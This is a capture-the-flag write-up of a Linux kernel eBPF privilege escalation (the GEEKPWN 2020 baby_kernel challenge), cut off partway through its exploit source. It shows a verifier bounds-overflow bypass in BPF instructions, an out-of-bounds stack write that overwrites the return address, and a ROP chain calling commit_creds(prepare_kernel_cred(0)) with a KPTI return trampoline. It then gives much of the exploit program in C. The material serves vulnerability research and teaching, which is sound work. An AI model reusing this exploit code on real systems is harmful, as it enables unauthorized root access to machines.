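Recently a stream of eBPF vulnerability analyses has appeared online, probably set off by CVE-2020-27194. Almost all of the published exploits follow the approach ZDI used for CVE-2020-8835: build arbitrary read/write primitives and use them to escalate privileges. Using the baby_kernel challenge from the GEEKPWN 2020 Cloud Security Challenge finals as an example, this post shares a different approach based on a stack overflow, to keep the topic warm a little longer.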

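Challenge analysis

Version

```
git checkout d82a532a611572d85fd2610ec41b5c9e222931b6
```

I did not have the original challenge files, so I applied the challenge patch by hand based on public write-ups: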

```c
static void scalar_min_max_add(struct bpf_reg_state *dst_reg,
			       struct bpf_reg_state *src_reg)
{
	s64 smin_val = src_reg->smin_value;
	s64 smax_val = src_reg->smax_value;
	u64 umin_val = src_reg->umin_value;
	u64 umax_val = src_reg->umax_value;

	/*
	if (signed_add_overflows(dst_reg->smin_value, smin_val) ||
	    signed_add_overflows(dst_reg->smax_value, smax_val)) {
		dst_reg->smin_value = S64_MIN;
		dst_reg->smax_value = S64_MAX;
	} else {
	*/
		dst_reg->smin_value += smin_val;
		dst_reg->smax_value += smax_val;
	/*}
	if (dst_reg->umin_value + umin_val < umin_val ||
	    dst_reg->umax_value + umax_val < umax_val) {
		dst_reg->umin_value = 0;
		dst_reg->umax_value = U64_MAX;
	} else {*/
		dst_reg->umin_value += umin_val;
		dst_reg->umax_value += umax_val;
	//}
}
```

This patch removes the overflow checks from the verifier's 64-bit (signed and unsigned) bounds tracking for addition.
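To see what the missing check changes, here is a simplified user-space model of the unsigned half of `scalar_min_max_add`, before and after the patch. It is a sketch only: `struct range`, `add_checked` and `add_patched` are hypothetical names, and only `umin`/`umax` are modelled. The input bounds are those of r5 after the `JLE` against 0x8000000000000000 used in the bypass.

```c
#include <stdint.h>

/* Hypothetical stand-in for the unsigned bounds of struct bpf_reg_state. */
struct range {
    uint64_t umin, umax;
};

/* Unpatched behaviour: if either bound wraps around, give up and mark the
 * register as completely unknown, [0, U64_MAX]. */
static struct range add_checked(struct range dst, struct range src)
{
    if (dst.umin + src.umin < src.umin || dst.umax + src.umax < src.umax)
        return (struct range){0, UINT64_MAX};
    return (struct range){dst.umin + src.umin, dst.umax + src.umax};
}

/* Patched behaviour: the bounds are added blindly and may wrap. */
static struct range add_patched(struct range dst, struct range src)
{
    return (struct range){dst.umin + src.umin, dst.umax + src.umax};
}

/* Bounds of r5 after "if r5 <= 0x8000000000000000": [0, 2^63]. */
static const struct range r5_bounds = {0, 0x8000000000000000ULL};
```

Adding r5 to itself gives `[0, U64_MAX]` with the check and `[0, 0]` with the patch, because 2^63 + 2^63 wraps to 0. This matches the `umax_value=0` in the verifier log.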

```c
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
				      struct bpf_insn *insn,
				      struct bpf_reg_state *dst_reg,
				      struct bpf_reg_state src_reg)
{
	...
	} else {
		src_known = tnum_is_const(src_reg.var_off);
		if ((src_known &&
		     (smin_val != smax_val || umin_val != umax_val)) ||
		    smin_val > smax_val /*|| umin_val > umax_val*/ ) {
			/* Taint dst register if offset had invalid bounds
			 * derived from e.g. dead branches.
			 */
			__mark_reg_unknown(env, dst_reg);
			return 0;
		}
	}
	...
```

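This part of the patch removes the `umin_val > umax_val` sanity check on the 64-bit unsigned bounds in `adjust_scalar_min_max_vals`. The key change is still the missing overflow check on 64-bit addition: if we make the bounds overflow, we can get past the verifier's later checks.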

The bypass works as follows:

```c
BPF_LD_IMM64(BPF_REG_6, 0x8000000000000000),   // r6 = 0x8000000000000000
BPF_JMP_REG(BPF_JLE, BPF_REG_5, BPF_REG_6, 1), // if r5 <= r6 goto pc+1
BPF_EXIT_INSN(),                               // exit
BPF_ALU64_REG(BPF_ADD, BPF_REG_5, BPF_REG_5),  // r5 += r5
BPF_MOV64_REG(BPF_REG_6, BPF_REG_5),           // r6 = r5
BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 33),         // r6 >>= 33
```

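r5 is a value read from the map. The conditional jump first constrains r5 so that umax_value = 0x8000000000000000, while umin_value keeps its default of 0. Adding r5 to itself then makes the verifier compute the range [0, 0], because 0x8000000000000000 + 0x8000000000000000 overflows to 0. At this point var_off.mask is 0xffffffff (only the low 32 bits are unknown), so after a right shift by 33 the verifier concludes that r6 is the constant 0. At run time, however, if r5 is 0x100000000 the computation goes like this: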

```
r5 = 0x100000000
r5 += r5   ->  0x100000000 + 0x100000000 = 0x200000000
r6 = r5    =   0x200000000
r6 >>= 33  ->  0x200000000 >> 33 = 1
```
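Why does var_off end up as (0x0; 0xffffffff) and then collapse to a constant 0? A plausible explanation, assuming a v5.7+ verifier that tracks 32-bit subregister bounds separately: the patch shown above only touches the 64-bit `scalar_min_max_add`. The 64-bit range therefore collapses to [0, 0], while the overflow-checked 32-bit range stays [0, U32_MAX]. `__reg_bound_offset` merges both into var_off, leaving only the low 32 bits unknown, and `>> 33` discards them.

The sketch below re-implements the relevant tnum helpers in user space. The names mirror `kernel/bpf/tnum.c`, but this is a model, not the kernel code, and `bound_offset`, `r5_after_add` and `r6_runtime` are hypothetical. It compares the verifier's view with the concrete run.

```c
#include <stdint.h>

/* Tristate number: bits set in mask are unknown, the others equal value. */
struct tnum {
    uint64_t value, mask;
};

#define TNUM(v, m) ((struct tnum){(v), (m)})
static const struct tnum tnum_unknown = {0, UINT64_MAX};

static struct tnum tnum_range(uint64_t min, uint64_t max)
{
    uint64_t chi = min ^ max;
    int bits = chi ? 64 - __builtin_clzll(chi) : 0; /* fls64(chi), GCC/Clang builtin */

    if (bits > 63)
        return tnum_unknown;
    uint64_t delta = (1ULL << bits) - 1;
    return TNUM(min & ~delta, delta);
}

static struct tnum tnum_intersect(struct tnum a, struct tnum b)
{
    uint64_t v = a.value | b.value, mu = a.mask & b.mask;
    return TNUM(v & ~mu, mu);
}

static struct tnum tnum_or(struct tnum a, struct tnum b)
{
    uint64_t v = a.value | b.value, mu = a.mask | b.mask;
    return TNUM(v, mu & ~v);
}

static struct tnum tnum_rshift(struct tnum a, unsigned int shift)
{
    return TNUM(a.value >> shift, a.mask >> shift);
}

static struct tnum tnum_subreg(struct tnum a)       /* keep the low 32 bits */
{
    return TNUM(a.value & 0xffffffffULL, a.mask & 0xffffffffULL);
}

static struct tnum tnum_clear_subreg(struct tnum a) /* zero the low 32 bits */
{
    return TNUM(a.value & ~0xffffffffULL, a.mask & ~0xffffffffULL);
}

/* Model of __reg_bound_offset(): refine var_off with the 64-bit and the
 * 32-bit unsigned bounds, then merge the two halves. */
static struct tnum bound_offset(struct tnum var_off, uint64_t umin, uint64_t umax,
                                uint32_t u32_min, uint32_t u32_max)
{
    struct tnum var64 = tnum_intersect(var_off, tnum_range(umin, umax));
    struct tnum var32 = tnum_intersect(tnum_subreg(var_off),
                                       tnum_range(u32_min, u32_max));
    return tnum_or(tnum_clear_subreg(var64), var32);
}

/* Verifier view of r5 after the patched "r5 += r5": 64-bit range [0, 0],
 * 32-bit range still [0, U32_MAX], var_off unknown before refinement. */
static struct tnum r5_after_add(void)
{
    return bound_offset(tnum_unknown, 0, 0, 0, UINT32_MAX);
}

/* What actually happens at run time. */
static uint64_t r6_runtime(uint64_t r5)
{
    r5 += r5;
    return r5 >> 33;
}
```

In this model `r5_after_add()` is `(0x0; 0xffffffff)`, `tnum_rshift(r5_after_add(), 33)` is the constant 0, and `r6_runtime(0x100000000)` is 1. The verifier and the real execution disagree.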

The verifier log:

```
12: (18) r6 = 0x8000000000000000
14: (bd) if r5 <= r6 goto pc+1
15: (95) exit
16: R0_w=invP1 R5_w=invP(id=0,umax_value=9223372036854775808) R6_w=invP-9223372036854775808 R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) ...
16: (0f) r5 += r5
17: R0_w=invP1 R5_w=invP(id=0,umax_value=0,var_off=(0x0; 0xffffffff)) R6_w=invP-9223372036854775808 R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256...
17: (bf) r6 = r5
18: R0_w=invP1 R5_w=invP(id=0,umax_value=0,var_off=(0x0; 0xffffffff)) R6_w=invP(id=0,umax_value=0,var_off=(0x0; 0xffffffff)) R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_p...
18: (77) r6 >>= 33
19: R0_w=invP1 R5_w=invP(id=0,umax_value=0,var_off=(0x0; 0xffffffff)) R6_w=invP0 R8_w=map_value(id=0,off=0,ks=4,vs=256,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=256,imm=0) R10=fp0 fp-...
```

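There are many ways to bypass the checks. The core idea is always the same. During verification, the verifier must believe that a value derived from the input is a constant after some computation. At run time, however, the input can be arbitrary. Every later check is then based on a wrong assumption, which allows out-of-bounds reads and writes.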

Exploitation

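Once the check is bypassed we can read and write out of bounds on the stack. That means we can overwrite the return address directly and use a ROP chain to get past the various protections and escalate privileges. This is quicker and more convenient than building arbitrary read/write primitives. Randomization of kernel structure layouts does not get in the way either; only the ROP chain differs from kernel to kernel.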

The stack overflow part:

```c
BPF_MOV64_REG(BPF_REG_7, BPF_REG_10),            // r7 = fp, used for out-of-bounds stack access
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -0x38),        // r7 = fp - 0x38
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x20),         // r6 = 0x20 at run time (0 for the verifier);
                                                 // r6 must not exceed 0x38, so it is added twice
BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),
BPF_ALU64_REG(BPF_ADD, BPF_REG_7, BPF_REG_6),    // r7 = fp + 0x8 at run time: rop[0]
BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0x18), // r0 = map[3]
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),    // *(u64 *)r7 = r0
```

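r10 holds the BPF frame pointer, which points into the kernel stack. r10 itself cannot be modified, so it is copied into r7. Adding -0x38 gives r7 = fp - 0x38, an in-bounds stack address. Because r6 must not exceed 0x38, it is scaled to 0x20 and added twice. At run time this yields r7 = fp - 0x38 + 0x20 + 0x20 = fp + 0x8. In the author's environment fp + 0x8 holds the return address, so overwriting it (and the slots above it) runs the ROP chain.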
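The text does not say why r6 must stay below 0x38. A likely reason, assumed here rather than stated by the author, is the verifier's Spectre v1 mitigation for pointer arithmetic, which applies to unprivileged programs. For `ptr += reg` on a stack pointer at fp - 0x38, the verifier records `alu_limit = 0x38`. It then patches in a few instructions so that any offset of 0x38 or more is masked to 0 at run time. Because the verifier thinks r6 is 0, r7 still looks like fp - 0x38 after the first add. Each add of 0x20 is therefore checked against the same limit and passes.

The sketch models that masking sequence (MOV32 AX, limit - 1; SUB; OR; NEG; ARSH 63; AND) in C. `mask_offset` and `r7_offset_from_fp` are hypothetical names.

```c
#include <stdint.h>

/* Model of the masking the verifier inserts before "ptr += off" for
 * unprivileged programs (as in 5.x-era fixup code; an assumption here). */
static uint64_t mask_offset(uint64_t off, uint32_t alu_limit)
{
    uint64_t ax = (uint32_t)(alu_limit - 1); /* BPF_MOV32_IMM zero-extends */
    ax -= off;                               /* BPF_SUB  AX, off           */
    ax |= off;                               /* BPF_OR   AX, off           */
    ax = 0 - ax;                             /* BPF_NEG  AX                */
    ax = (ax >> 63) ? UINT64_MAX : 0;        /* BPF_ARSH AX, 63            */
    return off & ax;                         /* BPF_AND  off, AX           */
}

/* Offset of r7 relative to fp after "r7 = fp - 0x38" and two
 * "r7 += r6", with r6 = step at run time. */
static int64_t r7_offset_from_fp(uint64_t step)
{
    int64_t r7 = -0x38;
    r7 += (int64_t)mask_offset(step, 0x38);
    r7 += (int64_t)mask_offset(step, 0x38);
    return r7;
}
```

Under this model, 0x20 and 0x37 pass through unchanged while 0x40 is masked to 0. `r7_offset_from_fp(0x20)` is `+0x8`, matching the text. The later adds of 8 (after `r6 >>= 2`) also stay under the limit.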

The ROP chain I found in my environment:

```
pop_rdi_ret;     // rop[0]   pop rdi; ret;
0;               // rop[1]
prepare_kernel;  // rop[2]
xchg_rax_rdi;    // rop[3]   xchg rax, rdi; dec dword ptr [rax - 0x77]; ret;
commit_creds;    // rop[4]
kpti_ret;        // rop[5]   swapgs_restore_regs_and_return_to_usermode + 0x16
0;               // rop[6]
0;               // rop[7]
&get_shell;      // rop[8]
user_cs;         // rop[9]
user_rflags;     // rop[10]
user_sp;         // rop[11]
user_ss;         // rop[12]
```

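The chain first runs commit_creds(prepare_kernel_cred(0)). It then jumps into swapgs_restore_regs_and_return_to_usermode, which switches back to the user page tables (getting past KPTI) and returns to user mode.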



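KPTI (Kernel Page Table Isolation) completely separates the user-space and kernel-space page tables. It mitigates the CPU vulnerabilities disclosed earlier (Meltdown) by preventing information leaks through side-channel attacks.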

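With KPTI every process has two sets of page tables, that is, two address spaces: kernel-mode page tables and user-mode page tables. The kernel-mode page tables are only used in kernel mode and map both the kernel and user space (user pages remain protected by SMAP and SMEP). The user-mode page tables contain only user space. There is one exception: because of context switches, they must also map a small part of the kernel, namely the interrupt entry and exit code.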

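When an interrupt occurs in user mode, CR3 must be switched from the user address space to the kernel address space. The top half of an interrupt handler has to be as fast as possible, so the CR3 switch must be fast too. To achieve this, KPTI places the kernel PGD and the user PGD next to each other in one 8 KB block, with the kernel PGD in the lower half and the user PGD in the upper half. The block is 8 KB aligned, so switching CR3 reduces to setting or clearing bit 12 of CR3 (the 13th bit counting from the least significant end), which keeps the switch fast.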

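In short, bit 12 of CR3 decides whether the user or the kernel page tables are in use. To get past KPTI on the way back to user mode we only need to set this bit, which switches from the kernel PGD to the user PGD. So we need a gadget like this: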

```asm
mov rdi, cr3
or  rdi, 1000h
mov cr3, rdi
```
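The arithmetic behind the gadget can be sketched as follows. The PGD address 0x12344000 is a made-up example, `USER_PGD_BIT` and the helper functions are hypothetical names, and real CR3 values also carry PCID and flag bits that this sketch ignores. The kernel PGD sits at an 8 KB-aligned base and the user PGD 4 KB above it, so setting or clearing bit 12 selects one or the other.

```c
#include <stdint.h>

#define USER_PGD_BIT 0x1000ULL /* bit 12 (hypothetical name) */

/* The gadget: mov rdi, cr3; or rdi, 1000h; mov cr3, rdi */
static uint64_t cr3_to_user(uint64_t cr3)
{
    return cr3 | USER_PGD_BIT;
}

/* The reverse switch performed on kernel entry. */
static uint64_t cr3_to_kernel(uint64_t cr3)
{
    return cr3 & ~USER_PGD_BIT;
}

/* The PGD pair must start on an 8 KB boundary, so bit 12 of the kernel
 * PGD address is always 0 and the user PGD is exactly +0x1000. */
static int pgd_pair_aligned(uint64_t kernel_pgd)
{
    return (kernel_pgd & 0x1fffULL) == 0;
}
```

For the example value, `cr3_to_user(0x12344000)` gives 0x12345000, and `cr3_to_kernel` maps it back.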

Conveniently, entering swapgs_restore_regs_and_return_to_usermode at +0x16 leads straight into this gadget:

```asm
swapgs_restore_regs_and_return_to_usermode:
.text:FFFFFFFF81600A34 41 5F            pop     r15
.text:FFFFFFFF81600A36 41 5E            pop     r14
.text:FFFFFFFF81600A38 41 5D            pop     r13
.text:FFFFFFFF81600A3A 41 5C            pop     r12
.text:FFFFFFFF81600A3C 5D               pop     rbp
.text:FFFFFFFF81600A3D 5B               pop     rbx
.text:FFFFFFFF81600A3E 41 5B            pop     r11
.text:FFFFFFFF81600A40 41 5A            pop     r10
.text:FFFFFFFF81600A42 41 59            pop     r9
.text:FFFFFFFF81600A44 41 58            pop     r8
.text:FFFFFFFF81600A46 58               pop     rax
.text:FFFFFFFF81600A47 59               pop     rcx
.text:FFFFFFFF81600A48 5A               pop     rdx
.text:FFFFFFFF81600A49 5E               pop     rsi
.text:FFFFFFFF81600A4A 48 89 E7         mov     rdi, rsp        ; <<< entry point (+0x16)
.text:FFFFFFFF81600A4D 65 48 8B 24 25+  mov     rsp, gs:0x5004
.text:FFFFFFFF81600A56 FF 77 30         push    qword ptr [rdi+30h]
.text:FFFFFFFF81600A59 FF 77 28         push    qword ptr [rdi+28h]
.text:FFFFFFFF81600A5C FF 77 20         push    qword ptr [rdi+20h]
.text:FFFFFFFF81600A5F FF 77 18         push    qword ptr [rdi+18h]
.text:FFFFFFFF81600A62 FF 77 10         push    qword ptr [rdi+10h]
.text:FFFFFFFF81600A65 FF 37            push    qword ptr [rdi]
.text:FFFFFFFF81600A67 50               push    rax
.text:FFFFFFFF81600A68 EB 43            nop
.text:FFFFFFFF81600A6A 0F 20 DF         mov     rdi, cr3
.text:FFFFFFFF81600A6D EB 34            jmp     0xFFFFFFFF81600AA3
.text:FFFFFFFF81600AA3 48 81 CF 00 10+  or      rdi, 1000h
.text:FFFFFFFF81600AAA 0F 22 DF         mov     cr3, rdi
.text:FFFFFFFF81600AAD 58               pop     rax
.text:FFFFFFFF81600AAE 5F               pop     rdi
.text:FFFFFFFF81600AAF FF 15 23 65 62+  call    cs:SWAPGS
.text:FFFFFFFF81600AB5 FF 25 15 65 62+  jmp     cs:INTERRUPT_RETURN

_SWAPGS:
.text:FFFFFFFF8103EFC0 55               push    rbp
.text:FFFFFFFF8103EFC1 48 89 E5         mov     rbp, rsp
.text:FFFFFFFF8103EFC4 0F 01 F8         swapgs
.text:FFFFFFFF8103EFC7 5D               pop     rbp
.text:FFFFFFFF8103EFC8 C3               retn
```

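Finally, SWAPGS swaps the kernel and user GS base, and iretq pops the previously pushed RIP, CS, RFLAGS, RSP and SS, restoring the user-mode register context. Execution continues at RIP = &get_shell with root credentials, which completes the privilege escalation.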
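Which ROP slot ends up where? When commit_creds returns into `kpti_ret` (rop[5]), RSP points at rop[6], so `mov rdi, rsp` makes RDI = &rop[6]. The struct below is a hypothetical type laid out after the `[rdi+...]` offsets in the disassembly. It maps rop[6]..rop[12] to the values the gadget copies to the trampoline stack. rop[7] is never read on this path (in `pt_regs` that slot would be `orig_ax`), which is why it can be 0.

```c
#include <stddef.h>
#include <stdint.h>

/* Stack contents seen through RDI (= &rop[6]) at "mov rdi, rsp". */
struct kpti_ret_frame {
    uint64_t rdi;    /* [rdi+0x00] rop[6]:  pushed, later "pop rdi" */
    uint64_t unused; /* [rdi+0x08] rop[7]:  not pushed by this path */
    uint64_t rip;    /* [rdi+0x10] rop[8]:  &get_shell */
    uint64_t cs;     /* [rdi+0x18] rop[9]:  user_cs */
    uint64_t rflags; /* [rdi+0x20] rop[10]: user_rflags */
    uint64_t rsp;    /* [rdi+0x28] rop[11]: user_sp */
    uint64_t ss;     /* [rdi+0x30] rop[12]: user_ss */
};

_Static_assert(offsetof(struct kpti_ret_frame, rip) == 0x10, "RIP slot");
_Static_assert(offsetof(struct kpti_ret_frame, ss) == 0x30, "SS slot");

/* Index in rop[] of the qword at a given offset from RDI. */
static size_t rop_index(size_t frame_offset)
{
    return 6 + frame_offset / sizeof(uint64_t);
}
```

The five pushes from `[rdi+30h]` down to `[rdi+10h]` leave RIP on top of the trampoline stack once RAX and RDI have been popped again. This is the order iretq expects: RIP, CS, RFLAGS, RSP, SS.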

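The full exploit is below. The BPF program is triggered twice. With op = 0 it copies the qword located 0x110 bytes before the map value into map[2]; in the author's build this is the map's ops pointer (array_map_ops), which gives the kernel base. With a nonzero op it copies the ROP chain from map[3]..map[15] onto the stack.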

```c
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <sys/personality.h>
#include <sys/prctl.h>
#include "./bpf.h" /* presumably a local copy of the uapi header <linux/bpf.h> */

#define BPF_JMP32 0x06
#define BPF_JLT 0xa0
#define BPF_OBJ_GET_INFO_BY_FD 15
#define BPF_MAP_TYPE_STACK 0x17

#define BPF_ALU64_IMM(OP, DST, IMM)                 \
	((struct bpf_insn) {                        \
		.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
		.dst_reg = DST,                     \
		.src_reg = 0,                       \
		.off = 0,                           \
		.imm = IMM })

#define BPF_ALU64_REG(OP, DST, SRC)                 \
	((struct bpf_insn) {                        \
		.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
		.dst_reg = DST,                     \
		.src_reg = SRC,                     \
		.off = 0,                           \
		.imm = 0 })

#define BPF_ALU32_IMM(OP, DST, IMM)                 \
	((struct bpf_insn) {                        \
		.code = BPF_ALU | BPF_OP(OP) | BPF_K, \
		.dst_reg = DST,                     \
		.src_reg = 0,                       \
		.off = 0,                           \
		.imm = IMM })

#define BPF_ALU32_REG(OP, DST, SRC)                 \
	((struct bpf_insn) {                        \
		.code = BPF_ALU | BPF_OP(OP) | BPF_X, \
		.dst_reg = DST,                     \
		.src_reg = SRC,                     \
		.off = 0,                           \
		.imm = 0 })

#define BPF_MOV64_REG(DST, SRC)                     \
	((struct bpf_insn) {                        \
		.code = BPF_ALU64 | BPF_MOV | BPF_X, \
		.dst_reg = DST,                     \
		.src_reg = SRC,                     \
		.off = 0,                           \
		.imm = 0 })

#define BPF_MOV32_REG(DST, SRC)                     \
	((struct bpf_insn) {                        \
		.code = BPF_ALU | BPF_MOV | BPF_X,  \
		.dst_reg = DST,                     \
		.src_reg = SRC,                     \
		.off = 0,                           \
		.imm = 0 })

#define BPF_MOV64_IMM(DST, IMM)                     \
	((struct bpf_insn) {                        \
		.code = BPF_ALU64 | BPF_MOV | BPF_K, \
		.dst_reg = DST,                     \
		.src_reg = 0,                       \
		.off = 0,                           \
		.imm = IMM })

#define BPF_MOV32_IMM(DST, IMM)                     \
	((struct bpf_insn) {                        \
		.code = BPF_ALU | BPF_MOV | BPF_K,  \
		.dst_reg = DST,                     \
		.src_reg = 0,                       \
		.off = 0,                           \
		.imm = IMM })

/* 64-bit immediate load: occupies two instruction slots. */
#define BPF_LD_IMM64(DST, IMM)                      \
	BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)             \
	((struct bpf_insn) {                        \
		.code = BPF_LD | BPF_DW | BPF_IMM,  \
		.dst_reg = DST,                     \
		.src_reg = SRC,                     \
		.off = 0,                           \
		.imm = (__u32) (IMM) }),            \
	((struct bpf_insn) {                        \
		.code = 0,                          \
		.dst_reg = 0,                       \
		.src_reg = 0,                       \
		.off = 0,                           \
		.imm = ((__u64) (IMM)) >> 32 })

#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD 1
#endif

#define BPF_LD_MAP_FD(DST, MAP_FD)                  \
	BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

/* Memory load, dst_reg = *(uint *) (src_reg + off16) */
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)            \
	((struct bpf_insn) {                        \
		.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \
		.dst_reg = DST,                     \
		.src_reg = SRC,                     \
		.off = OFF,                         \
		.imm = 0 })

/* Memory store, *(uint *) (dst_reg + off16) = src_reg */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF)            \
	((struct bpf_insn) {                        \
		.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \
		.dst_reg = DST,                     \
		.src_reg = SRC,                     \
		.off = OFF,                         \
		.imm = 0 })

#define BPF_ST_MEM(SIZE, DST, OFF, IMM)             \
	((struct bpf_insn) {                        \
		.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
		.dst_reg = DST,                     \
		.src_reg = 0,                       \
		.off = OFF,                         \
		.imm = IMM })

/* Unconditional jumps, goto pc + off16 */
#define BPF_JMP_A(OFF)                              \
	((struct bpf_insn) {                        \
		.code = BPF_JMP | BPF_JA,           \
		.dst_reg = 0,                       \
		.src_reg = 0,                       \
		.off = OFF,                         \
		.imm = 0 })

#define BPF_JMP32_REG(OP, DST, SRC, OFF)            \
	((struct bpf_insn) {                        \
		.code = BPF_JMP32 | BPF_OP(OP) | BPF_X, \
		.dst_reg = DST,                     \
		.src_reg = SRC,                     \
		.off = OFF,                         \
		.imm = 0 })

/* Like BPF_JMP_IMM, but with 32-bit wide operands for comparison. */
#define BPF_JMP32_IMM(OP, DST, IMM, OFF)            \
	((struct bpf_insn) {                        \
		.code = BPF_JMP32 | BPF_OP(OP) | BPF_K, \
		.dst_reg = DST,                     \
		.src_reg = 0,                       \
		.off = OFF,                         \
		.imm = IMM })

#define BPF_JMP_REG(OP, DST, SRC, OFF)              \
	((struct bpf_insn) {                        \
		.code = BPF_JMP | BPF_OP(OP) | BPF_X, \
		.dst_reg = DST,                     \
		.src_reg = SRC,                     \
		.off = OFF,                         \
		.imm = 0 })

#define BPF_JMP_IMM(OP, DST, IMM, OFF)              \
	((struct bpf_insn) {                        \
		.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
		.dst_reg = DST,                     \
		.src_reg = 0,                       \
		.off = OFF,                         \
		.imm = IMM })

#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM)      \
	((struct bpf_insn) {                        \
		.code = CODE,                       \
		.dst_reg = DST,                     \
		.src_reg = SRC,                     \
		.off = OFF,                         \
		.imm = IMM })

#define BPF_EXIT_INSN()                             \
	((struct bpf_insn) {                        \
		.code = BPF_JMP | BPF_EXIT,         \
		.dst_reg = 0,                       \
		.src_reg = 0,                       \
		.off = 0,                           \
		.imm = 0 })

/* r_dst = *(u64 *)map_lookup_elem(r9, &idx); exit if the lookup fails */
#define BPF_MAP_GET(idx, dst)                                                  \
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),       /* r1 = r9 */                   \
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),      /* r2 = fp */                   \
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),     /* r2 = fp - 4 */               \
	BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),    /* *(u32 *)(fp - 4) = idx */    \
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),      \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),     /* if (r0 == 0) */              \
	BPF_EXIT_INSN(),                           /*     exit(0); */              \
	BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0)   /* r_dst = *(u64 *)(r0) */

/* r_dst = map_lookup_elem(r9, &idx); exit if the lookup fails */
#define BPF_MAP_GET_ADDR(idx, dst)                                             \
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),       /* r1 = r9 */                   \
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),      /* r2 = fp */                   \
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),     /* r2 = fp - 4 */               \
	BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),    /* *(u32 *)(fp - 4) = idx */    \
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),      \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),     /* if (r0 == 0) */              \
	BPF_EXIT_INSN(),                           /*     exit(0); */              \
	BPF_MOV64_REG((dst), BPF_REG_0)            /* r_dst = (r0) */

char buffer[64];
int sockets[2];
int progfd;
int exp_mapfd;
int doredact = 0;

#define LOG_BUF_SIZE 0x100000
char bpf_log_buf[LOG_BUF_SIZE];
uint64_t exp_buf[0x100];
char info[0x100];

#define RADIX_TREE_INTERNAL_NODE 2
#define RADIX_TREE_MAP_MASK 0x3f

static __u64 ptr_to_u64(void *ptr)
{
	return (__u64) (unsigned long) ptr;
}

int bpf_prog_load(enum bpf_prog_type prog_type,
		  const struct bpf_insn *insns, int prog_len,
		  const char *license, int kern_version)
{
	union bpf_attr attr = {
		.prog_type = prog_type,
		.insns = ptr_to_u64((void *) insns),
		.insn_cnt = prog_len / sizeof(struct bpf_insn),
		.license = ptr_to_u64((void *) license),
		.log_buf = ptr_to_u64(bpf_log_buf),
		.log_size = LOG_BUF_SIZE,
		.log_level = 1,
	};

	attr.kern_version = kern_version;
	bpf_log_buf[0] = 0;
	return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
		   int max_entries, int map_flags)
{
	union bpf_attr attr = {
		.map_type = map_type,
		.key_size = key_size,
		.value_size = value_size,
		.max_entries = max_entries
	};

	return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

static int bpf_update_elem(uint64_t key, void *value, int mapfd, uint64_t flags)
{
	union bpf_attr attr = {
		.map_fd = mapfd,
		.key = (__u64)&key,
		.value = (__u64)value,
		.flags = flags,
	};

	return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

static int bpf_lookup_elem(void *key, void *value, int mapfd)
{
	union bpf_attr attr = {
		.map_fd = mapfd,
		.key = (__u64)key,
		.value = (__u64)value,
	};

	return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

/* Unused helper: fetch the map info for mapfd into `info` and return the
 * u32 at offset 0x40. Only the .info member of the union is initialized,
 * since initializing several union members at once is not meaningful. */
static uint32_t bpf_map_get_info_by_fd(int mapfd, void *info)
{
	union bpf_attr attr = {
		.info.bpf_fd = mapfd,
		.info.info_len = 0x50,
		.info.info = (__u64)info,
	};

	syscall(__NR_bpf, BPF_OBJ_GET_INFO_BY_FD, &attr, sizeof(attr));
	return *(uint32_t *)((char *)info + 0x40);
}

static void __exit(char *err)
{
	fprintf(stderr, "error: %s\n", err);
	exit(-1);
}

static int load_my_prog(void)
{
	struct bpf_insn my_prog[] = {
		BPF_LD_MAP_FD(BPF_REG_9, exp_mapfd),
		BPF_MAP_GET(0, BPF_REG_5),                      // r5 = map[0] (input)
		BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),            // r8 = &map[0]
		BPF_MOV64_IMM(BPF_REG_0, 0x1),
